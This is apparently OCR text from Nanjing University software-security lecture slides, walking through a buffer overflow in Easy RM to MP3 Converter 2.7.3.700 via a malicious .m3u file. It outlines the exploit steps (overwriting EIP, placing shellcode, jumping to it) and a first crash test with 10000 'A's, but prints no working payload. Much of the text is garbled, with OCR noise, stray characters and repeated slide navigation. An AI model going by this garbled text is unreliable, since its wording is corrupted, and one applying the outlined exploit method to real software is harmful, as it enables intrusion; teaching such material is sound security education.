A Real World Buffer Overflow Attack Key Point Soltware Security Key Point to implement our attack 1.Determining the buffer size to write exactly into EIP Bufler Overflow;The Essentials 2.Find memory space to host the shellcode. 五4eE 3.Jump to the shellcode in a reliable way. Shellcode Dafieien Determining the buffer size to Shali-Spning write exactly into EIP A Real Word Butter Overflow Attac比 Key Peint Find momory space to host the shellcode 学■n Inleger Overfiow Overvie Jump to the shellcode in a AA:dM出E reliable way Hesp Overflow m过士aM年 Ahgad Ex=年 Got shellcode and finalize the exploit Naning Ueivarsiy
83 Software Security Buffer Overflow:The Essentials Vulnerability Metrics What are Buffer Overflow? Basic Example Shellcode Definition Basic Example Shell-Spawning Shellcode A Real World Buffer Overflow Attack 25 Key Point A vulnerability in Easy RM to MP3 Conversion How to hack the vulnerable program Integer Overflow Overview A Real World Example Common Patterns in Integer Overflow Heap Overflow What is the Heap? An Abstract Example Dept. of Computer Science, Nanjing University A Real World Buffer Overflow Attack Key Point Key Point to implement our attack I 1.Determining the buffer size to write exactly into EIP I 2.Find memory space to host the shellcode. I 3.Jump to the shellcode in a reliable way
Real Attack A vulnerability in Easy RM to MP3 Conversion Soltware Security A vulnerability in Easy RM to MP3 Conversion Utility Verify the bug Bufler Overfow:The Essentials The vulnerability report states "Easy RM to MP3 Converter version 2.7.3.700 universal buffer overflow Banc Eluntha exploit that creates a malicious.m3u file" Shellcode In other words,you can create a malicious.m3u file,feed it Shali-Spamning into the utility and trigger the exploit. A Real Waric时Buie Overflow Attack A vuleratily in Easy RM 1o MPS Comvirsiont 学■n Inleger Overfiow Owerve Adh出E ttagar Oiaife Hesp Overflow m过士aM年 MHEE年 Naning Ueivarsity
83 Software Security Buffer Overflow:The Essentials Vulnerability Metrics What are Buffer Overflow? Basic Example Shellcode Definition Basic Example Shell-Spawning Shellcode A Real World Buffer Overflow Attack Key Point 26 A vulnerability in Easy RM to MP3 Conversion How to hack the vulnerable program Integer Overflow Overview A Real World Example Common Patterns in Integer Overflow Heap Overflow What is the Heap? An Abstract Example Dept. of Computer Science, Nanjing University Real Attack A vulnerability in Easy RM to MP3 Conversion A vulnerability in Easy RM to MP3 Conversion Utility Verify the bug I The vulnerability report states "Easy RM to MP3 Converter version 2.7.3.700 universal buffer overflow exploit that creates a malicious .m3u file" I In other words, you can create a malicious .m3u file, feed it into the utility and trigger the exploit
Real Attack A vulnerability in Easy RM to MP3 Conversion Soltware Security A vulnerability in Easy RM to MP3 Conversion Utility Verify the bug Bufler Overflow;The Essentials The vulnerability report states "Easy RM to MP3 Converter version 2.7.3.700 universal buffer overflow Banc Elurnphe exploit that creates a malicious.m3u file" Shellcode Daficien In other words,you can create a malicious.m3u file,feed it Shali-Spamning into the utility and trigger the exploit. A Real Word Butter Overflow Attac比 A in Easy RM Easy RM to MP3 Converter s18 1o MPS Comeirsiont 学■n M论 Inleger Overfiow Overvie Please pr63s笔s时ar间esne AAdM出E lrtagar Diuifen Hesp Overflow m过士aM年 Purchase Load Batch Start Ahead Ex=年 Naning Ueivarsiy
83 Software Security Buffer Overflow:The Essentials Vulnerability Metrics What are Buffer Overflow? Basic Example Shellcode Definition Basic Example Shell-Spawning Shellcode A Real World Buffer Overflow Attack Key Point 26 A vulnerability in Easy RM to MP3 Conversion How to hack the vulnerable program Integer Overflow Overview A Real World Example Common Patterns in Integer Overflow Heap Overflow What is the Heap? An Abstract Example Dept. of Computer Science, Nanjing University Real Attack A vulnerability in Easy RM to MP3 Conversion A vulnerability in Easy RM to MP3 Conversion Utility Verify the bug I The vulnerability report states "Easy RM to MP3 Converter version 2.7.3.700 universal buffer overflow exploit that creates a malicious .m3u file" I In other words, you can create a malicious .m3u file, feed it into the utility and trigger the exploit
Real Attack A vulnerability in Easy RM to MP3 Conversion Soltware Security A vulnerability in Easy RM to MP3 Conversion Utility Bufler Overflow;The Essentials Verify the bug Load the crach.m3u(contains 10000'A)into the Banc Eluntha application. Shellcode Dafieien Shali-Spamning A Real Word Butter A in Easy RM 1o MPS Comeirsiont 学■n Inleger Overfiow Owerve Aadh出E Hesp Overflaw mt士sM年到 Ahgad Ex-年 Nanjng Uivarsiy
83 Software Security Buffer Overflow:The Essentials Vulnerability Metrics What are Buffer Overflow? Basic Example Shellcode Definition Basic Example Shell-Spawning Shellcode A Real World Buffer Overflow Attack Key Point 27 A vulnerability in Easy RM to MP3 Conversion How to hack the vulnerable program Integer Overflow Overview A Real World Example Common Patterns in Integer Overflow Heap Overflow What is the Heap? An Abstract Example Dept. of Computer Science, Nanjing University Real Attack A vulnerability in Easy RM to MP3 Conversion A vulnerability in Easy RM to MP3 Conversion Utility Verify the bug I Load the crach.m3u(contains 10000’A) into the application. Failure in loading the file! Not Crash!!!
Real Attack A vulnerability in Easy RM to MP3 Conversion Soltware Security A vulnerability in Easy RM to MP3 Conversion Utility Bufler Overflow;The Essentials Verify the bug Load the crach.m3u(contains 10000'A)into the 五4eE application. Shellcode Daficien Shali-Spamning A Real Word Butter Overflow Attac比 A in Easy RM 1o MPS Comeirsiont 学■n E29R制tDM3 Converter Inleger Overfiow Overvie AdM出E 巴enmon Fanlinta litagar Diaifes Hesp Overflow m过士aM年中 Ahead Ex-年 Naning Ueivarsiy
83 Software Security Buffer Overflow:The Essentials Vulnerability Metrics What are Buffer Overflow? Basic Example Shellcode Definition Basic Example Shell-Spawning Shellcode A Real World Buffer Overflow Attack Key Point 27 A vulnerability in Easy RM to MP3 Conversion How to hack the vulnerable program Integer Overflow Overview A Real World Example Common Patterns in Integer Overflow Heap Overflow What is the Heap? An Abstract Example Dept. of Computer Science, Nanjing University Real Attack A vulnerability in Easy RM to MP3 Conversion A vulnerability in Easy RM to MP3 Conversion Utility Verify the bug I Load the crach.m3u(contains 10000’A) into the application. Failure in loading the file! Not Crash!!!